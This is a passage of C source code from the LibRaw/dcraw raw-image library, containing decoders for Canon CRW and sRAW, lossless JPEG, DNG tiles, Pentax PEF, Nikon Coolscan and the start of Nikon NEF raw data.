if (mc > 1 && mc <= 1.28 && yc < 0.8789) t=1;
if (mc > 1.28 && mc <= 2) {
if (yc < 0.8789) t=3;
else if (yc <= 2) t=4;
}
if (flash_used) t=5;
for (raw_color = i=0; i < 3; i++)
FORCC rgb_cam[i][c] = table[t][i*4 + c] / 1024.0;
}
void CLASS canon_600_load_raw()
{
uchar data[1120], *dp;
ushort *pix;
int irow, row;
for (irow=row=0; irow < height; irow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (data, 1, 1120, ifp) < 1120) derror();
pix = raw_image + row*raw_width;
for (dp=data; dp < data+1120; dp+=10, pix+=8) {
pix[0] = (dp[0] << 2) + (dp[1] >> 6 );
pix[1] = (dp[2] << 2) + (dp[1] >> 4 & 3);
pix[2] = (dp[3] << 2) + (dp[1] >> 2 & 3);
pix[3] = (dp[4] << 2) + (dp[1] & 3);
pix[4] = (dp[5] << 2) + (dp[9] & 3);
pix[5] = (dp[6] << 2) + (dp[9] >> 2 & 3);
pix[6] = (dp[7] << 2) + (dp[9] >> 4 & 3);
pix[7] = (dp[8] << 2) + (dp[9] >> 6 );
}
if ((row+=2) > height) row = 1;
}
}
void CLASS canon_600_correct()
{
int row, col, val;
static const short mul[4][2] =
{ { 1141,1145 }, { 1128,1109 }, { 1178,1149 }, { 1128,1109 } };
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++) {
if ((val = BAYER(row,col) - black) < 0) val = 0;
val = val * mul[row & 3][col & 1] >> 9;
BAYER(row,col) = val;
}
}
canon_600_fixed_wb(1311);
canon_600_auto_wb();
canon_600_coeff();
maximum = (0x3ff - black) * 1109 >> 9;
black = 0;
}
int CLASS canon_s2is()
{
unsigned row;
for (row=0; row < 100; row++) {
fseek (ifp, row*3340 + 3284, SEEK_SET);
if (getc(ifp) > 15) return 1;
}
return 0;
}
unsigned CLASS getbithuff (int nbits, ushort *huff)
{
#ifdef LIBRAW_NOTHREADS
static unsigned bitbuf=0;
static int vbits=0, reset=0;
#else
#define bitbuf tls->getbits.bitbuf
#define vbits tls->getbits.vbits
#define reset tls->getbits.reset
#endif
unsigned c;
if (nbits > 25) return 0;
if (nbits < 0)
return bitbuf = vbits = reset = 0;
if (nbits == 0 || vbits < 0) return 0;
while (!reset && vbits < nbits && (c = fgetc(ifp)) != EOF &&
!(reset = zero_after_ff && c == 0xff && fgetc(ifp))) {
bitbuf = (bitbuf << 8) + (uchar) c;
vbits += 8;
}
c = bitbuf << (32-vbits) >> (32-nbits);
if (huff) {
vbits -= huff[c] >> 8;
c = (uchar) huff[c];
} else
vbits -= nbits;
if (vbits < 0) derror();
return c;
#ifndef LIBRAW_NOTHREADS
#undef bitbuf
#undef vbits
#undef reset
#endif
}
#define getbits(n) getbithuff(n,0)
#define gethuff(h) getbithuff(*h,h+1)
/*
Construct a decode tree according the specification in *source.
The first 16 bytes specify how many codes should be 1-bit, 2-bit
3-bit, etc. Bytes after that are the leaf values.
For example, if the source is
{ 0,1,4,2,3,1,2,0,0,0,0,0,0,0,0,0,
0x04,0x03,0x05,0x06,0x02,0x07,0x01,0x08,0x09,0x00,0x0a,0x0b,0xff },
then the code is
00 0x04
010 0x03
011 0x05
100 0x06
101 0x02
1100 0x07
1101 0x01
11100 0x08
11101 0x09
11110 0x00
111110 0x0a
1111110 0x0b
1111111 0xff
*/
ushort * CLASS make_decoder_ref (const uchar **source)
{
int max, len, h, i, j;
const uchar *count;
ushort *huff;
count = (*source += 16) - 17;
for (max=16; max && !count[max]; max--);
huff = (ushort *) calloc (1 + (1 << max), sizeof *huff);
merror (huff, "make_decoder()");
huff[0] = max;
for (h=len=1; len <= max; len++)
for (i=0; i < count[len]; i++, ++*source)
for (j=0; j < 1 << (max-len); j++)
if (h <= 1 << max)
huff[h++] = len << 8 | **source;
return huff;
}
ushort * CLASS make_decoder (const uchar *source)
{
return make_decoder_ref (&source);
}
void CLASS crw_init_tables (unsigned table, ushort *huff[2])
{
static const uchar first_tree[3][29] = {
{ 0,1,4,2,3,1,2,0,0,0,0,0,0,0,0,0,
0x04,0x03,0x05,0x06,0x02,0x07,0x01,0x08,0x09,0x00,0x0a,0x0b,0xff },
{ 0,2,2,3,1,1,1,1,2,0,0,0,0,0,0,0,
0x03,0x02,0x04,0x01,0x05,0x00,0x06,0x07,0x09,0x08,0x0a,0x0b,0xff },
{ 0,0,6,3,1,1,2,0,0,0,0,0,0,0,0,0,
0x06,0x05,0x07,0x04,0x08,0x03,0x09,0x02,0x00,0x0a,0x01,0x0b,0xff },
};
static const uchar second_tree[3][180] = {
{ 0,2,2,2,1,4,2,1,2,5,1,1,0,0,0,139,
0x03,0x04,0x02,0x05,0x01,0x06,0x07,0x08,
0x12,0x13,0x11,0x14,0x09,0x15,0x22,0x00,0x21,0x16,0x0a,0xf0,
0x23,0x17,0x24,0x31,0x32,0x18,0x19,0x33,0x25,0x41,0x34,0x42,
0x35,0x51,0x36,0x37,0x38,0x29,0x79,0x26,0x1a,0x39,0x56,0x57,
0x28,0x27,0x52,0x55,0x58,0x43,0x76,0x59,0x77,0x54,0x61,0xf9,
0x71,0x78,0x75,0x96,0x97,0x49,0xb7,0x53,0xd7,0x74,0xb6,0x98,
0x47,0x48,0x95,0x69,0x99,0x91,0xfa,0xb8,0x68,0xb5,0xb9,0xd6,
0xf7,0xd8,0x67,0x46,0x45,0x94,0x89,0xf8,0x81,0xd5,0xf6,0xb4,
0x88,0xb1,0x2a,0x44,0x72,0xd9,0x87,0x66,0xd4,0xf5,0x3a,0xa7,
0x73,0xa9,0xa8,0x86,0x62,0xc7,0x65,0xc8,0xc9,0xa1,0xf4,0xd1,
0xe9,0x5a,0x92,0x85,0xa6,0xe7,0x93,0xe8,0xc1,0xc6,0x7a,0x64,
0xe1,0x4a,0x6a,0xe6,0xb3,0xf1,0xd3,0xa5,0x8a,0xb2,0x9a,0xba,
0x84,0xa4,0x63,0xe5,0xc5,0xf3,0xd2,0xc4,0x82,0xaa,0xda,0xe4,
0xf2,0xca,0x83,0xa3,0xa2,0xc3,0xea,0xc2,0xe2,0xe3,0xff,0xff },
{ 0,2,2,1,4,1,4,1,3,3,1,0,0,0,0,140,
0x02,0x03,0x01,0x04,0x05,0x12,0x11,0x06,
0x13,0x07,0x08,0x14,0x22,0x09,0x21,0x00,0x23,0x15,0x31,0x32,
0x0a,0x16,0xf0,0x24,0x33,0x41,0x42,0x19,0x17,0x25,0x18,0x51,
0x34,0x43,0x52,0x29,0x35,0x61,0x39,0x71,0x62,0x36,0x53,0x26,
0x38,0x1a,0x37,0x81,0x27,0x91,0x79,0x55,0x45,0x28,0x72,0x59,
0xa1,0xb1,0x44,0x69,0x54,0x58,0xd1,0xfa,0x57,0xe1,0xf1,0xb9,
0x49,0x47,0x63,0x6a,0xf9,0x56,0x46,0xa8,0x2a,0x4a,0x78,0x99,
0x3a,0x75,0x74,0x86,0x65,0xc1,0x76,0xb6,0x96,0xd6,0x89,0x85,
0xc9,0xf5,0x95,0xb4,0xc7,0xf7,0x8a,0x97,0xb8,0x73,0xb7,0xd8,
0xd9,0x87,0xa7,0x7a,0x48,0x82,0x84,0xea,0xf4,0xa6,0xc5,0x5a,
0x94,0xa4,0xc6,0x92,0xc3,0x68,0xb5,0xc8,0xe4,0xe5,0xe6,0xe9,
0xa2,0xa3,0xe3,0xc2,0x66,0x67,0x93,0xaa,0xd4,0xd5,0xe7,0xf8,
0x88,0x9a,0xd7,0x77,0xc4,0x64,0xe2,0x98,0xa5,0xca,0xda,0xe8,
0xf3,0xf6,0xa9,0xb2,0xb3,0xf2,0xd2,0x83,0xba,0xd3,0xff,0xff },
{ 0,0,6,2,1,3,3,2,5,1,2,2,8,10,0,117,
0x04,0x05,0x03,0x06,0x02,0x07,0x01,0x08,
0x09,0x12,0x13,0x14,0x11,0x15,0x0a,0x16,0x17,0xf0,0x00,0x22,
0x21,0x18,0x23,0x19,0x24,0x32,0x31,0x25,0x33,0x38,0x37,0x34,
0x35,0x36,0x39,0x79,0x57,0x58,0x59,0x28,0x56,0x78,0x27,0x41,
0x29,0x77,0x26,0x42,0x76,0x99,0x1a,0x55,0x98,0x97,0xf9,0x48,
0x54,0x96,0x89,0x47,0xb7,0x49,0xfa,0x75,0x68,0xb6,0x67,0x69,
0xb9,0xb8,0xd8,0x52,0xd7,0x88,0xb5,0x74,0x51,0x46,0xd9,0xf8,
0x3a,0xd6,0x87,0x45,0x7a,0x95,0xd5,0xf6,0x86,0xb4,0xa9,0x94,
0x53,0x2a,0xa8,0x43,0xf5,0xf7,0xd4,0x66,0xa7,0x5a,0x44,0x8a,
0xc9,0xe8,0xc8,0xe7,0x9a,0x6a,0x73,0x4a,0x61,0xc7,0xf4,0xc6,
0x65,0xe9,0x72,0xe6,0x71,0x91,0x93,0xa6,0xda,0x92,0x85,0x62,
0xf3,0xc5,0xb2,0xa4,0x84,0xba,0x64,0xa5,0xb3,0xd2,0x81,0xe5,
0xd3,0xaa,0xc4,0xca,0xf2,0xb1,0xe4,0xd1,0x83,0x63,0xea,0xc3,
0xe2,0x82,0xf1,0xa3,0xc2,0xa1,0xc1,0xe3,0xa2,0xe1,0xff,0xff }
};
if (table > 2) table = 2;
huff[0] = make_decoder ( first_tree[table]);
huff[1] = make_decoder (second_tree[table]);
}
/*
Return 0 if the image starts with compressed data,
1 if it starts with uncompressed low-order bits.
In Canon compressed data, 0xff is always followed by 0x00.
*/
int CLASS canon_has_lowbits()
{
uchar test[0x4000];
int ret=1, i;
fseek (ifp, 0, SEEK_SET);
fread (test, 1, sizeof test, ifp);
for (i=540; i < sizeof test - 1; i++)
if (test[i] == 0xff) {
if (test[i+1]) return 1;
ret=0;
}
return ret;
}
void CLASS canon_load_raw()
{
ushort *pixel, *prow, *huff[2];
int nblocks, lowbits, i, c, row, r, save, val;
int block, diffbuf[64], leaf, len, diff, carry=0, pnum=0, base[2];
crw_init_tables (tiff_compress, huff);
lowbits = canon_has_lowbits();
if (!lowbits) maximum = 0x3ff;
fseek (ifp, 540 + lowbits*raw_height*raw_width/4, SEEK_SET);
zero_after_ff = 1;
getbits(-1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row+=8) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
pixel = raw_image + row*raw_width;
nblocks = MIN (8, raw_height-row) * raw_width >> 6;
for (block=0; block < nblocks; block++) {
memset (diffbuf, 0, sizeof diffbuf);
for (i=0; i < 64; i++ ) {
leaf = gethuff(huff[i > 0]);
if (leaf == 0 && i) break;
if (leaf == 0xff) continue;
i += leaf >> 4;
len = leaf & 15;
if (len == 0) continue;
diff = getbits(len);
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - 1;
if (i < 64) diffbuf[i] = diff;
}
diffbuf[0] += carry;
carry = diffbuf[0];
for (i=0; i < 64; i++ ) {
if (pnum++ % raw_width == 0)
base[0] = base[1] = 512;
if ((pixel[(block << 6) + i] = base[i & 1] += diffbuf[i]) >> 10)
derror();
}
}
if (lowbits) {
save = ftell(ifp);
fseek (ifp, 26 + row*raw_width/4, SEEK_SET);
for (prow=pixel, i=0; i < raw_width*2; i++) {
c = fgetc(ifp);
for (r=0; r < 8; r+=2, prow++) {
val = (*prow << 2) + ((c >> r) & 3);
if (raw_width == 2672 && val < 512) val += 2;
*prow = val;
}
}
fseek (ifp, save, SEEK_SET);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
FORC(2) free (huff[c]);
throw;
}
#endif
FORC(2) free (huff[c]);
}
//@end COMMON
struct jhead {
int algo, bits, high, wide, clrs, sraw, psv, restart, vpred[6];
ushort quant[64], idct[64], *huff[20], *free[20], *row;
};
//@out COMMON
int CLASS ljpeg_start (struct jhead *jh, int info_only)
{
ushort c, tag, len;
int cnt = 0;
uchar data[0x10000];
const uchar *dp;
memset (jh, 0, sizeof *jh);
jh->restart = INT_MAX;
if ((fgetc(ifp),fgetc(ifp)) != 0xd8) return 0;
do {
if(feof(ifp)) return 0;
if(cnt++ > 1024) return 0; // 1024 tags limit
if (!fread (data, 2, 2, ifp)) return 0;
tag = data[0] << 8 | data[1];
len = (data[2] << 8 | data[3]) - 2;
if (tag <= 0xff00) return 0;
fread (data, 1, len, ifp);
switch (tag) {
case 0xffc3: // start of frame; lossless, Huffman
jh->sraw = ((data[7] >> 4) * (data[7] & 15) - 1) & 3;
case 0xffc1:
case 0xffc0:
jh->algo = tag & 0xff;
jh->bits = data[0];
jh->high = data[1] << 8 | data[2];
jh->wide = data[3] << 8 | data[4];
jh->clrs = data[5] + jh->sraw;
if (len == 9 && !dng_version) getc(ifp);
break;
case 0xffc4: // define Huffman tables
if (info_only) break;
for (dp = data; dp < data+len && !((c = *dp++) & -20); )
jh->free[c] = jh->huff[c] = make_decoder_ref (&dp);
break;
case 0xffda: // start of scan
jh->psv = data[1+data[0]*2];
jh->bits -= data[3+data[0]*2] & 15;
break;
case 0xffdb:
FORC(64) jh->quant[c] = data[c*2+1] << 8 | data[c*2+2];
break;
case 0xffdd:
jh->restart = data[0] << 8 | data[1];
}
} while (tag != 0xffda);
if (jh->bits > 16 || jh->clrs > 6 ||
!jh->bits || !jh->high || !jh->wide || !jh->clrs) return 0;
if (info_only) return 1;
if (!jh->huff[0]) return 0;
FORC(19) if (!jh->huff[c+1]) jh->huff[c+1] = jh->huff[c];
if (jh->sraw) {
FORC(4) jh->huff[2+c] = jh->huff[1];
FORC(jh->sraw) jh->huff[1+c] = jh->huff[0];
}
jh->row = (ushort *) calloc (jh->wide*jh->clrs, 4);
merror (jh->row, "ljpeg_start()");
return zero_after_ff = 1;
}
void CLASS ljpeg_end (struct jhead *jh)
{
int c;
FORC4 if (jh->free[c]) free (jh->free[c]);
free (jh->row);
}
int CLASS ljpeg_diff (ushort *huff)
{
int len, diff;
if(!huff)
#ifdef LIBRAW_LIBRARY_BUILD
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#else
longjmp (failure, 2);
#endif
len = gethuff(huff);
if (len == 16 && (!dng_version || dng_version >= 0x1010000))
return -32768;
diff = getbits(len);
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - 1;
return diff;
}
ushort * CLASS ljpeg_row (int jrow, struct jhead *jh)
{
int col, c, diff, pred, spred=0;
ushort mark=0, *row[3];
if (jrow * jh->wide % jh->restart == 0) {
FORC(6) jh->vpred[c] = 1 << (jh->bits-1);
if (jrow) {
fseek (ifp, -2, SEEK_CUR);
do mark = (mark << 8) + (c = fgetc(ifp));
while (c != EOF && mark >> 4 != 0xffd);
}
getbits(-1);
}
FORC3 row[c] = jh->row + jh->wide*jh->clrs*((jrow+c) & 1);
for (col=0; col < jh->wide; col++)
FORC(jh->clrs) {
diff = ljpeg_diff (jh->huff[c]);
if (jh->sraw && c <= jh->sraw && (col | c))
pred = spred;
else if (col) pred = row[0][-jh->clrs];
else pred = (jh->vpred[c] += diff) - diff;
if (jrow && col) switch (jh->psv) {
case 1: break;
case 2: pred = row[1][0]; break;
case 3: pred = row[1][-jh->clrs]; break;
case 4: pred = pred + row[1][0] - row[1][-jh->clrs]; break;
case 5: pred = pred + ((row[1][0] - row[1][-jh->clrs]) >> 1); break;
case 6: pred = row[1][0] + ((pred - row[1][-jh->clrs]) >> 1); break;
case 7: pred = (pred + row[1][0]) >> 1; break;
default: pred = 0;
}
if ((**row = pred + diff) >> jh->bits) derror();
if (c <= jh->sraw) spred = **row;
row[0]++; row[1]++;
}
return row[2];
}
void CLASS lossless_jpeg_load_raw()
{
int jwide, jhigh, jrow, jcol, val, jidx, i, j, row=0, col=0;
struct jhead jh;
ushort *rp;
if (!ljpeg_start (&jh, 0)) return;
if(jh.wide<1 || jh.high<1 || jh.clrs<1 || jh.bits <1)
#ifdef LIBRAW_LIBRARY_BUILD
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#else
longjmp (failure, 2);
#endif
jwide = jh.wide * jh.clrs;
jhigh = jh.high;
if(jh.clrs == 4 && jwide >= raw_width*2) jhigh *= 2;
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (jrow=0; jrow < jh.high; jrow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
rp = ljpeg_row (jrow, &jh);
if (load_flags & 1)
row = jrow & 1 ? height-1-jrow/2 : jrow/2;
for (jcol=0; jcol < jwide; jcol++) {
val = curve[*rp++];
if (cr2_slice[0]) {
jidx = jrow*jwide + jcol;
i = jidx / (cr2_slice[1]*raw_height);
if ((j = i >= cr2_slice[0]))
i = cr2_slice[0];
jidx -= i * (cr2_slice[1]*raw_height);
row = jidx / cr2_slice[1+j];
col = jidx % cr2_slice[1+j] + i*cr2_slice[1];
}
if (raw_width == 3984 && (col -= 2) < 0)
col += (row--,raw_width);
if(row>raw_height)
#ifdef LIBRAW_LIBRARY_BUILD
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#else
longjmp (failure, 3);
#endif
if ((unsigned) row < raw_height) RAW(row,col) = val;
if (++col >= raw_width)
col = (row++,0);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw;
}
#endif
ljpeg_end (&jh);
}
void CLASS canon_sraw_load_raw()
{
struct jhead jh;
short *rp=0, (*ip)[4];
int jwide, slice, scol, ecol, row, col, jrow=0, jcol=0, pix[3], c;
int v[3]={0,0,0}, ver, hue;
#ifdef LIBRAW_LIBRARY_BUILD
int saved_w = width, saved_h = height;
#endif
char *cp;
if (!ljpeg_start (&jh, 0) || jh.clrs < 4) return;
jwide = (jh.wide >>= 1) * jh.clrs;
#ifdef LIBRAW_LIBRARY_BUILD
if(load_flags & 256)
{
width = raw_width;
height = raw_height;
}
try {
#endif
for (ecol=slice=0; slice <= cr2_slice[0]; slice++) {
scol = ecol;
ecol += cr2_slice[1] * 2 / jh.clrs;
if (!cr2_slice[0] || ecol > raw_width-1) ecol = raw_width & -2;
for (row=0; row < height; row += (jh.clrs >> 1) - 1) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
ip = (short (*)[4]) image + row*width;
for (col=scol; col < ecol; col+=2, jcol+=jh.clrs) {
if ((jcol %= jwide) == 0)
rp = (short *) ljpeg_row (jrow++, &jh);
if (col >= width) continue;
#ifdef LIBRAW_LIBRARY_BUILD
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_INTERPOLATE)
{
FORC (jh.clrs-2)
{
ip[col + (c >> 1)*width + (c & 1)][0] = rp[jcol+c];
ip[col + (c >> 1)*width + (c & 1)][1] = ip[col + (c >> 1)*width + (c & 1)][2] = 8192;
}
ip[col][1] = rp[jcol+jh.clrs-2] - 8192;
ip[col][2] = rp[jcol+jh.clrs-1] - 8192;
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_RGB)
{
FORC (jh.clrs-2)
ip[col + (c >> 1)*width + (c & 1)][0] = rp[jcol+c];
ip[col][1] = rp[jcol+jh.clrs-2] - 8192;
ip[col][2] = rp[jcol+jh.clrs-1] - 8192;
}
else
#endif
{
FORC (jh.clrs-2)
ip[col + (c >> 1)*width + (c & 1)][0] = rp[jcol+c];
ip[col][1] = rp[jcol+jh.clrs-2] - 16384;
ip[col][2] = rp[jcol+jh.clrs-1] - 16384;
}
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw ;
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_INTERPOLATE)
{
ljpeg_end (&jh);
maximum = 0x3fff;
height = saved_h;
width = saved_w;
return;
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (cp=model2; *cp && !isdigit(*cp); cp++);
sscanf (cp, "%d.%d.%d", v, v+1, v+2);
ver = (v[0]*1000 + v[1])*1000 + v[2];
hue = (jh.sraw+1) << 2;
if (unique_id >= 0x80000281 || (unique_id == 0x80000218 && ver > 1000006))
hue = jh.sraw << 1;
ip = (short (*)[4]) image;
rp = ip[0];
for (row=0; row < height; row++, ip+=width) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (row & (jh.sraw >> 1))
{
for (col=0; col < width; col+=2)
for (c=1; c < 3; c++)
if (row == height-1)
{
ip[col][c] = ip[col-width][c];
}
else
{
ip[col][c] = (ip[col-width][c] + ip[col+width][c] + 1) >> 1;
}
}
for (col=1; col < width; col+=2)
for (c=1; c < 3; c++)
if (col == width-1)
ip[col][c] = ip[col-1][c];
else ip[col][c] = (ip[col-1][c] + ip[col+1][c] + 1) >> 1;
}
#ifdef LIBRAW_LIBRARY_BUILD
if(!(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_RGB) )
#endif
for ( ; rp < ip[0]; rp+=4) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (unique_id == 0x80000218 ||
unique_id == 0x80000250 ||
unique_id == 0x80000261 ||
unique_id == 0x80000281 ||
unique_id == 0x80000287) {
rp[1] = (rp[1] << 2) + hue;
rp[2] = (rp[2] << 2) + hue;
pix[0] = rp[0] + (( 50*rp[1] + 22929*rp[2]) >> 14);
pix[1] = rp[0] + ((-5640*rp[1] - 11751*rp[2]) >> 14);
pix[2] = rp[0] + ((29040*rp[1] - 101*rp[2]) >> 14);
} else {
if (unique_id < 0x80000218) rp[0] -= 512;
pix[0] = rp[0] + rp[2];
pix[2] = rp[0] + rp[1];
pix[1] = rp[0] + ((-778*rp[1] - (rp[2] << 11)) >> 12);
}
FORC3 rp[c] = CLIP(pix[c] * sraw_mul[c] >> 10);
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw ;
}
height = saved_h;
width = saved_w;
#endif
ljpeg_end (&jh);
maximum = 0x3fff;
}
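/*
Stores one decoded DNG sample: into raw_image[] (through curve[]) for
Bayer data, or into all tiff_samples planes of image[] otherwise.
When shot_select picks the second of two samples, *rp is biased by one.
*/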
void CLASS adobe_copy_pixel (unsigned row, unsigned col, ushort **rp)
{
int c;
if (tiff_samples == 2 && shot_select) (*rp)++;
if (raw_image) {
if (row < raw_height && col < raw_width)
RAW(row,col) = curve[**rp];
*rp += tiff_samples;
} else {
if (row < height && col < width)
FORC(tiff_samples)
image[row*width+col][c] = curve[(*rp)[c]];
*rp += tiff_samples;
}
if (tiff_samples == 2 && shot_select) (*rp)--;
}
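/*
Inverse DCT for lossy (SOF 0xc1) DNG tiles: reads up to 64 Huffman-coded
coefficients in zigzag order, dequantizes them with jh->quant[], and
applies a separable 8x8 IDCT into jh->idct[].
*/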
void CLASS ljpeg_idct (struct jhead *jh)
{
int c, i, j, len, skip, coef;
float work[3][8][8];
static float cs[106] = { 0 };
static const uchar zigzag[80] =
{ 0, 1, 8,16, 9, 2, 3,10,17,24,32,25,18,11, 4, 5,12,19,26,33,
40,48,41,34,27,20,13, 6, 7,14,21,28,35,42,49,56,57,50,43,36,
29,22,15,23,30,37,44,51,58,59,52,45,38,31,39,46,53,60,61,54,
47,55,62,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63 };
if (!cs[0])
FORC(106) cs[c] = cos((c & 31)*M_PI/16)/2;
memset (work, 0, sizeof work);
work[0][0][0] = jh->vpred[0] += ljpeg_diff (jh->huff[0]) * jh->quant[0];
for (i=1; i < 64; i++ ) {
len = gethuff (jh->huff[16]);
i += skip = len >> 4;
if (!(len &= 15) && skip < 15) break;
coef = getbits(len);
if ((coef & (1 << (len-1))) == 0)
coef -= (1 << len) - 1;
((float *)work)[zigzag[i]] = coef * jh->quant[i];
}
FORC(8) work[0][0][c] *= M_SQRT1_2;
FORC(8) work[0][c][0] *= M_SQRT1_2;
for (i=0; i < 8; i++)
for (j=0; j < 8; j++)
FORC(8) work[1][i][j] += work[0][i][c] * cs[(j*2+1)*c];
for (i=0; i < 8; i++)
for (j=0; j < 8; j++)
FORC(8) work[2][i][j] += work[1][c][j] * cs[(i*2+1)*c];
FORC(64) jh->idct[c] = CLIP(((float *)work[2])[c]+0.5);
}
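/*
Walks the DNG tile table: each tile is its own JPEG stream.  SOF 0xc3
tiles are decoded row by row with ljpeg_row(), SOF 0xc1 tiles as 8x8
DCT blocks with ljpeg_idct(); samples land via adobe_copy_pixel().
*/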
void CLASS lossless_dng_load_raw()
{
unsigned save, trow=0, tcol=0, jwide, jrow, jcol, row, col, i, j;
struct jhead jh;
ushort *rp;
while (trow < raw_height) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
save = ftell(ifp);
if (tile_length < INT_MAX)
fseek (ifp, get4(), SEEK_SET);
if (!ljpeg_start (&jh, 0)) break;
jwide = jh.wide;
if (filters) jwide *= jh.clrs;
jwide /= MIN (is_raw, tiff_samples);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
switch (jh.algo) {
case 0xc1:
jh.vpred[0] = 16384;
getbits(-1);
for (jrow=0; jrow+7 < jh.high; jrow += 8) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (jcol=0; jcol+7 < jh.wide; jcol += 8) {
ljpeg_idct (&jh);
rp = jh.idct;
row = trow + jcol/tile_width + jrow*2;
col = tcol + jcol%tile_width;
for (i=0; i < 16; i+=2)
for (j=0; j < 8; j++)
adobe_copy_pixel (row+i, col+j, &rp);
}
}
break;
case 0xc3:
for (row=col=jrow=0; jrow < jh.high; jrow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
rp = ljpeg_row (jrow, &jh);
for (jcol=0; jcol < jwide; jcol++) {
adobe_copy_pixel (trow+row, tcol+col, &rp);
if (++col >= tile_width || col >= raw_width)
row += 1 + (col = 0);
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw ;
}
#endif
fseek (ifp, save+4, SEEK_SET);
if ((tcol += tile_width) >= raw_width)
trow += tile_length + (tcol = 0);
ljpeg_end (&jh);
}
}
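/*
Uncompressed DNG: reads one row of tiff_samples-interleaved values
(16-bit shorts or tiff_bps-wide bitfields) and forwards each pixel
to adobe_copy_pixel().
*/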
void CLASS packed_dng_load_raw()
{
ushort *pixel, *rp;
int row, col;
pixel = (ushort *) calloc (raw_width, tiff_samples*sizeof *pixel);
merror (pixel, "packed_dng_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (tiff_bps == 16)
read_shorts (pixel, raw_width * tiff_samples);
else {
getbits(-1);
for (col=0; col < raw_width * tiff_samples; col++)
pixel[col] = getbits(tiff_bps);
}
for (rp=pixel, col=0; col < raw_width; col++)
adobe_copy_pixel (row, col, &rp);
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
free (pixel);
throw ;
}
#endif
free (pixel);
}
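/*
Pentax PEF: builds a Huffman table from the depth/bit lists stored at
meta_offset, then decodes per-pixel differences with vertical predictors
for the first two columns and horizontal predictors afterwards.
*/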
void CLASS pentax_load_raw()
{
ushort bit[2][15], huff[4097];
int dep, row, col, diff, c, i;
ushort vpred[2][2] = {{0,0},{0,0}}, hpred[2];
fseek (ifp, meta_offset, SEEK_SET);
dep = (get2() + 12) & 15;
fseek (ifp, 12, SEEK_CUR);
FORC(dep) bit[0][c] = get2();
FORC(dep) bit[1][c] = fgetc(ifp);
FORC(dep)
for (i=bit[0][c]; i <= ((bit[0][c]+(4096 >> bit[1][c])-1) & 4095); )
huff[++i] = bit[1][c] << 8 | c;
huff[0] = 12;
fseek (ifp, data_offset, SEEK_SET);
getbits(-1);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
diff = ljpeg_diff (huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
RAW(row,col) = hpred[col & 1];
if (hpred[col & 1] >> tiff_bps) derror();
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS nikon_coolscan_load_raw()
{
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
int bypp = tiff_bps <= 8 ? 1 : 2;
int bufsize = width * 3 * bypp;
if (tiff_bps <= 8)
gamma_curve(1.0 / imgdata.params.coolscan_nef_gamma, 0., 1, 255);
else
gamma_curve(1.0/imgdata.params.coolscan_nef_gamma,0.,1,65535);
fseek (ifp, data_offset, SEEK_SET);
unsigned char *buf = (unsigned char*)malloc(bufsize);
unsigned short *ubuf = (unsigned short *)buf;
for(int row = 0; row < raw_height; row++)
{
int red = fread (buf, 1, bufsize, ifp);
unsigned short (*ip)[4] = (unsigned short (*)[4]) image + row*width;
if(tiff_bps <= 8)
for(int col=0; col<width;col++)
{
ip[col][0] = curve[buf[col*3]];
ip[col][1] = curve[buf[col*3+1]];
ip[col][2] = curve[buf[col*3+2]];
ip[col][3]=0;
}
else
for(int col=0; col<width;col++)
{
ip[col][0] = curve[ubuf[col*3]];
ip[col][1] = curve[ubuf[col*3+1]];
ip[col][2] = curve[ubuf[col*3+2]];
ip[col][3]=0;
}
}
free(buf);
}
#endif
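/*
Nikon NEF: picks one of six fixed Huffman trees by bit depth and
compression version, optionally rebuilds curve[] from a sampled LUT,
then decodes differences with vertical predictors in the first two
columns and horizontal predictors after that.  Lossy files may switch
to a second tree at the "split" row.
*/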
void CLASS nikon_load_raw()
{
static const uchar nikon_tree[][32] = {
{ 0,1,5,1,1,1,1,1,1,2,0,0,0,0,0,0, /* 12-bit lossy */
5,4,3,6,2,7,1,0,8,9,11,10,12 },
